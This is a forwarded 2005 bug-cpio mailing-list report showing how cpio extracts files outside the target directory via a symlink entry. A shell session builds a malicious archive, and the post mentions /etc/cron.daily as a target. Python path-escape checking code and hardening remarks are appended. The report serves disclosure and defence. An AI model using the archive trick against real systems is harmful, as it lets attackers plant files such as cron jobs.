Part 2.

---------- Forwarded message ----------
From: t takahashi <[EMAIL PROTECTED]>
Date: Apr 27, 2005 7:54 PM
Subject: Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)
To: [EMAIL PROTECTED], [email protected]
Cc: [EMAIL PROTECTED]

P.P.S. I found a more subtle security hole. It is even more dangerous.

/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
1 block

Notice that grep '\.\.' on the output of cpio -t would not find the relative pathname. You have to use cpio -vt.

Now watch this:

/tmp/aaa$ cpio -i<dangerous
1 block
/tmp/aaa$ ls
b  dangerous
/tmp/aaa$ ls ../b
trojan

IMHO cpio should disallow this by default. Imagine ../../../../../../../etc/cron.daily again. cpio should check for extracting in directories that are not below pwd, even if it is via indirect means such as a symlink.

Wow!

_______________________________________________
Bug-cpio mailing list
[email protected]
http://lists.gnu.org/mailman/listinfo/bug-cpio

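The check the report asks for, written out as an added example (this is not cpio's code and not part of the mailing-list post): before an extractor writes an archive entry, it walks every parent component of the destination, resolves symlinks, and refuses the write if the resolved directory is no longer below the extraction root. It also rejects absolute paths, `..` components, and symlink entries whose target points outside the root. The `simulate_report_scenario` function rebuilds the layout from the post (an `aaa` root, a sibling `b`, and `aaa/b -> ../b`) in a scratch directory; all names and the function names are assumptions made for this example.

```python
import os
import tempfile


def path_escapes_root(root, relpath):
    """Return True if writing archive member `relpath` under `root` would land
    outside `root`. Catches absolute paths, '..' components, and the indirect
    case from the report: a parent directory that is a symlink pointing out of
    the extraction root (b -> ../b, then b/trojan)."""
    if os.path.isabs(relpath):
        return True
    parts = [p for p in relpath.split("/") if p not in ("", ".")]
    if ".." in parts:
        return True
    real_root = os.path.realpath(root)
    cur = real_root
    # Resolve each parent component in turn; a symlinked directory that
    # resolves outside real_root means the final write would escape.
    for part in parts[:-1]:
        cur = os.path.join(cur, part)
        resolved = os.path.realpath(cur)
        if os.path.commonpath([real_root, resolved]) != real_root:
            return True
        cur = resolved
    return False


def symlink_target_escapes(root, relpath, target):
    """Return True if a symlink entry `relpath` with link target `target`
    would point outside `root` once created. Relative targets are resolved
    against the directory containing the link, as the OS would do."""
    if os.path.isabs(target):
        return True
    link_dir = os.path.dirname(relpath)
    joined = os.path.normpath(os.path.join(link_dir, target))
    return joined == ".." or joined.startswith("../")


def simulate_report_scenario():
    """Recreate the layout from the report in a scratch directory (constructed
    sample data): <tmp>/aaa is the extraction root, <tmp>/b sits beside it,
    and <tmp>/aaa/b is a symlink to ../b. Returns the verdict per entry."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "aaa")
        os.mkdir(root)
        os.mkdir(os.path.join(tmp, "b"))
        os.symlink("../b", os.path.join(root, "b"))
        entries = [
            "b",                    # the symlink entry itself (see symlink_target_escapes)
            "b/trojan",             # the write that lands in ../b
            "plain/file.txt",       # an ordinary, acceptable entry
            "../escape",            # plain dotdot traversal
            "/etc/cron.daily/x",    # leading slash
        ]
        return {e: path_escapes_root(root, e) for e in entries}


if __name__ == "__main__":
    for entry, escapes in simulate_report_scenario().items():
        print(f"{'REJECT' if escapes else 'ok    '} {entry}")
    print("symlink b -> ../b escapes:", symlink_target_escapes("/tmp/aaa", "b", "../b"))
```

Two things to notice. First, `cpio -t` output alone cannot reveal this: the entry `b/trojan` looks harmless until you know that `b` is a symlink, which is why the check has to be made against the filesystem at extraction time, not against the member list. Second, a check-then-write sequence like this one still has a race window between `realpath` and the actual write; a production extractor should additionally open each path component with `O_NOFOLLOW` (or `openat` relative to a root directory descriptor) so that a symlink swapped in after the check is refused by the kernel rather than followed.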